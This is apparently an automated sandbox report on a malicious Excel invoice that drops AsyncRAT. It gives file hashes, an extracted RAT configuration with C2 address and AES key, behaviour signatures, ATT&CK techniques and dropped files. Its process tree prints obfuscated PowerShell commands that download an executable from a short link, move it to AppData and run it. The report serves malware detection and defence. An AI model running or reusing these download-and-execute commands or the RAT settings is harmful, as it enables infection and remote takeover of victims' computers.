Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    26-10-2020 09:06

General

  • Target

    Invoice 098734543 3.xls

  • Size

    66KB

  • MD5

    a86efdb09b8ec5a298f512459ff8d64d

  • SHA1

    17a9506e70c78f7de865af5be040384997bba4cb

  • SHA256

    71444376cd428f1934e94d2933197c4f0bfe03019b845a81fdeb922bcae95d7a

  • SHA512

    b984f9b55e46861b6233b13e1e88200db7bd43c6c09d95ccd6bda6a189c6cd00b6a30dc94b574d9db0a2cb139ef2f5284ac7a84a580072575341187f225851f0

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://tinyurl.com/y6ak9qcl

Extracted

Family

asyncrat

Version

0.5.7B

C2

185.165.153.249:4371

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • aes_key

    4lpLfCzV6wCkayaT0MjD3qp2ZVBd759O

  • anti_detection

    false

  • autorun

    false

  • bdos

    false

  • delay

    Default

  • host

    185.165.153.249

  • hwid

    3

  • install_file

  • install_folder

    %AppData%

  • mutex

    AsyncMutex_6SI8OkPnk

  • pastebin_config

    null

  • port

    4371

  • version

    0.5.7B

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blacklisted process makes network request 3 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Invoice 098734543 3.xls"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1084
    • C:\Windows\SysWOW64\cmd.exe
      cmd /k p^ower^shell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht'+'tps://tinyurl.com/y6ak9qcl'),'ye.exe')
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1736
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht'+'tps://tinyurl.com/y6ak9qcl'),'ye.exe')
        3⤵
        • Blacklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1832
    • C:\Windows\SysWOW64\cmd.exe
      cmd /k p^ower^shell -w 1 stARt`-slE`Ep 20; Move-Item "ye.exe" -Destination "$env:appdata"
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1836
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -w 1 stARt`-slE`Ep 20; Move-Item "ye.exe" -Destination "$env:appdata"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1828
    • C:\Windows\SysWOW64\cmd.exe
      cmd /k po^wer^shell -w 1 stARt`-slE`Ep 25; cd $env:appdata; ./ye.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1840
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -w 1 stARt`-slE`Ep 25; cd $env:appdata; ./ye.exe
        3⤵
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1808
        • C:\Users\Admin\AppData\Roaming\ye.exe
          "C:\Users\Admin\AppData\Roaming\ye.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1608
          • C:\Windows\SysWOW64\timeout.exe
            timeout
            5⤵
            • Delays execution with timeout.exe
            PID:844
          • C:\Users\Admin\AppData\Roaming\ye.exe
            "C:\Users\Admin\AppData\Roaming\ye.exe"
            5⤵
            • Executes dropped EXE
            PID:1604

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

2
T1112

Install Root Certificate

1
T1130

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1e1c900c-0d58-484d-b929-67e01a0727ef
    MD5

    5e3c7184a75d42dda1a83606a45001d8

    SHA1

    94ca15637721d88f30eb4b6220b805c5be0360ed

    SHA256

    8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

    SHA512

    fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7eddb008-03b2-44b7-ba83-b7fd16fb2e89
    MD5

    02ff38ac870de39782aeee04d7b48231

    SHA1

    0390d39fa216c9b0ecdb38238304e518fb2b5095

    SHA256

    fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

    SHA512

    24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8e79d91b-e812-4269-8293-6068b9bab0d3
    MD5

    df44874327d79bd75e4264cb8dc01811

    SHA1

    1396b06debed65ea93c24998d244edebd3c0209d

    SHA256

    55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

    SHA512

    95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9eac8395-fc75-45b8-9c48-bfc1db7c3c0f
    MD5

    be4d72095faf84233ac17b94744f7084

    SHA1

    cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

    SHA256

    b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

    SHA512

    43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a426aac7-daac-4445-a1d2-56718314378c
    MD5

    a725bb9fafcf91f3c6b7861a2bde6db2

    SHA1

    8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

    SHA256

    51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

    SHA512

    1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a426aac7-daac-4445-a1d2-56718314378c
    MD5

    a725bb9fafcf91f3c6b7861a2bde6db2

    SHA1

    8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

    SHA256

    51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

    SHA512

    1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d6289801-864a-4184-a547-2523e131d25f
    MD5

    b6d38f250ccc9003dd70efd3b778117f

    SHA1

    d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

    SHA256

    4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

    SHA512

    67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fc7c09f4-994b-4a9f-927f-42cf9b846b51
    MD5

    75a8da7754349b38d64c87c938545b1b

    SHA1

    5c28c257d51f1c1587e29164cc03ea880c21b417

    SHA256

    bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

    SHA512

    798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ff960bfe-cfc4-4a4c-8e9b-ab6e5dcd6d96
    MD5

    597009ea0430a463753e0f5b1d1a249e

    SHA1

    4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

    SHA256

    3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

    SHA512

    5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    ec0b6930dcb0fa6d0401292cf62405fe

    SHA1

    8f22cdcc0dfb9afc09ea18a96410435edf3328a7

    SHA256

    42319e330e83ce5d8a6725c26f9b683871e9aade51b7419453b15d47a1919c15

    SHA512

    71fccc8d05a9a3a3aa90e03885cb6c8da8513edd5558a0a5d036c9c9fb83d10fe552353a5cb4833931a6684792e8669420d41517c53bebc08fd95f154204e642

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    dbb685a6942d1834479b57f1ca3e6871

    SHA1

    01b785da0930224565a83ce9938f7ab08da5cf41

    SHA256

    7d5c6d8dce30959241989e822922356e6359e90620f875dbedcb134e23def9c9

    SHA512

    0cd4437ac14ff3db55311f0a1187f7dadb8405ace0f5b4f6526cadeade859e8d6c936a8035d16196655d772bdf657bcad84c04d298d5ea57e42ec52351aeddcc

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    49efa48825b5acd2d2020112e5f03ae8

    SHA1

    8e53bd35a9dc64005bc47c750eb0ec87e5516abf

    SHA256

    09c2eefc6aba0a04a0ad64f7f74b4d7a0cfb401288c3a63420d1e387fa747252

    SHA512

    b19b82401d2439faeb6456491c4155465eecdf650b0c4b1a0bcf60146c64d05fe67f746b09cd3e92a6605a7a272f7a7069b3521c0229f7fcf9b1b1a50f55a1cb

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    MD5

    6f656f56f7362cb091311344f5673b1f

    SHA1

    f2c4ed3b9ddaf14e8e98e2ade7338279a57ede14

    SHA256

    b89bd893338b75e37c5be059360440fc3d24220ada7f53eba9b913b17ca3615b

    SHA512

    bbf739fed238794d4cab5152214b9e21bb0b537645634c9ed6a04c597aaaa6bf3b044930b7477bf81f616632bc0d49b2fff74e0a2cebb54495bd73e43e9f0ce8

  • C:\Users\Admin\AppData\Roaming\ye.exe
    MD5

    ae77db4c78360750c5b01b15d8453913

    SHA1

    e165beb3ad5d55ada5941d21a7d1d0b0472c27cd

    SHA256

    54747f101ba51f7364f85105375eb872927e2ec2414fd6fa32dc4797b4eb6e8e

    SHA512

    7911de411042cf339c81f0b0d3f315787445645beaed3d7a0d404a621a0bf3f99faf18f9e4a6b47162de3ae12a3326bdc70ab9f73c746e2649fca712d4852d73

  • C:\Users\Admin\AppData\Roaming\ye.exe
    MD5

    ae77db4c78360750c5b01b15d8453913

    SHA1

    e165beb3ad5d55ada5941d21a7d1d0b0472c27cd

    SHA256

    54747f101ba51f7364f85105375eb872927e2ec2414fd6fa32dc4797b4eb6e8e

    SHA512

    7911de411042cf339c81f0b0d3f315787445645beaed3d7a0d404a621a0bf3f99faf18f9e4a6b47162de3ae12a3326bdc70ab9f73c746e2649fca712d4852d73

  • C:\Users\Admin\Documents\ye.exe
    MD5

    ae77db4c78360750c5b01b15d8453913

    SHA1

    e165beb3ad5d55ada5941d21a7d1d0b0472c27cd

    SHA256

    54747f101ba51f7364f85105375eb872927e2ec2414fd6fa32dc4797b4eb6e8e

    SHA512

    7911de411042cf339c81f0b0d3f315787445645beaed3d7a0d404a621a0bf3f99faf18f9e4a6b47162de3ae12a3326bdc70ab9f73c746e2649fca712d4852d73

  • \Users\Admin\AppData\Roaming\ye.exe
    MD5

    ae77db4c78360750c5b01b15d8453913

    SHA1

    e165beb3ad5d55ada5941d21a7d1d0b0472c27cd

    SHA256

    54747f101ba51f7364f85105375eb872927e2ec2414fd6fa32dc4797b4eb6e8e

    SHA512

    7911de411042cf339c81f0b0d3f315787445645beaed3d7a0d404a621a0bf3f99faf18f9e4a6b47162de3ae12a3326bdc70ab9f73c746e2649fca712d4852d73

  • \Users\Admin\AppData\Roaming\ye.exe
    MD5

    ae77db4c78360750c5b01b15d8453913

    SHA1

    e165beb3ad5d55ada5941d21a7d1d0b0472c27cd

    SHA256

    54747f101ba51f7364f85105375eb872927e2ec2414fd6fa32dc4797b4eb6e8e

    SHA512

    7911de411042cf339c81f0b0d3f315787445645beaed3d7a0d404a621a0bf3f99faf18f9e4a6b47162de3ae12a3326bdc70ab9f73c746e2649fca712d4852d73

  • \Users\Admin\AppData\Roaming\ye.exe
    MD5

    ae77db4c78360750c5b01b15d8453913

    SHA1

    e165beb3ad5d55ada5941d21a7d1d0b0472c27cd

    SHA256

    54747f101ba51f7364f85105375eb872927e2ec2414fd6fa32dc4797b4eb6e8e

    SHA512

    7911de411042cf339c81f0b0d3f315787445645beaed3d7a0d404a621a0bf3f99faf18f9e4a6b47162de3ae12a3326bdc70ab9f73c746e2649fca712d4852d73

  • \Users\Admin\AppData\Roaming\ye.exe
    MD5

    ae77db4c78360750c5b01b15d8453913

    SHA1

    e165beb3ad5d55ada5941d21a7d1d0b0472c27cd

    SHA256

    54747f101ba51f7364f85105375eb872927e2ec2414fd6fa32dc4797b4eb6e8e

    SHA512

    7911de411042cf339c81f0b0d3f315787445645beaed3d7a0d404a621a0bf3f99faf18f9e4a6b47162de3ae12a3326bdc70ab9f73c746e2649fca712d4852d73

  • memory/844-63-0x0000000000000000-mapping.dmp
  • memory/1604-71-0x000000006C540000-0x000000006CC2E000-memory.dmp
    Filesize

    6.9MB

  • memory/1604-68-0x0000000000400000-0x0000000000412000-memory.dmp
    Filesize

    72KB

  • memory/1604-69-0x0000000000400000-0x0000000000412000-memory.dmp
    Filesize

    72KB

  • memory/1604-66-0x000000000040D06E-mapping.dmp
  • memory/1604-65-0x0000000000400000-0x0000000000412000-memory.dmp
    Filesize

    72KB

  • memory/1608-58-0x0000000000000000-mapping.dmp
  • memory/1608-64-0x0000000000220000-0x000000000023A000-memory.dmp
    Filesize

    104KB

  • memory/1608-62-0x0000000000E30000-0x0000000000E31000-memory.dmp
    Filesize

    4KB

  • memory/1608-61-0x000000006C540000-0x000000006CC2E000-memory.dmp
    Filesize

    6.9MB

  • memory/1736-0-0x0000000000000000-mapping.dmp
  • memory/1808-13-0x0000000004900000-0x0000000004901000-memory.dmp
    Filesize

    4KB

  • memory/1808-54-0x0000000006270000-0x0000000006271000-memory.dmp
    Filesize

    4KB

  • memory/1808-10-0x0000000000900000-0x0000000000901000-memory.dmp
    Filesize

    4KB

  • memory/1808-9-0x000000006C540000-0x000000006CC2E000-memory.dmp
    Filesize

    6.9MB

  • memory/1808-5-0x0000000000000000-mapping.dmp
  • memory/1828-7-0x000000006C540000-0x000000006CC2E000-memory.dmp
    Filesize

    6.9MB

  • memory/1828-3-0x0000000000000000-mapping.dmp
  • memory/1828-37-0x00000000061F0000-0x00000000061F1000-memory.dmp
    Filesize

    4KB

  • memory/1828-16-0x0000000002650000-0x0000000002651000-memory.dmp
    Filesize

    4KB

  • memory/1828-19-0x00000000027D0000-0x00000000027D1000-memory.dmp
    Filesize

    4KB

  • memory/1828-24-0x0000000005610000-0x0000000005611000-memory.dmp
    Filesize

    4KB

  • memory/1828-29-0x0000000005700000-0x0000000005701000-memory.dmp
    Filesize

    4KB

  • memory/1828-45-0x00000000062C0000-0x00000000062C1000-memory.dmp
    Filesize

    4KB

  • memory/1828-30-0x0000000005770000-0x0000000005771000-memory.dmp
    Filesize

    4KB

  • memory/1832-8-0x000000006C540000-0x000000006CC2E000-memory.dmp
    Filesize

    6.9MB

  • memory/1832-4-0x0000000000000000-mapping.dmp
  • memory/1836-1-0x0000000000000000-mapping.dmp
  • memory/1840-2-0x0000000000000000-mapping.dmp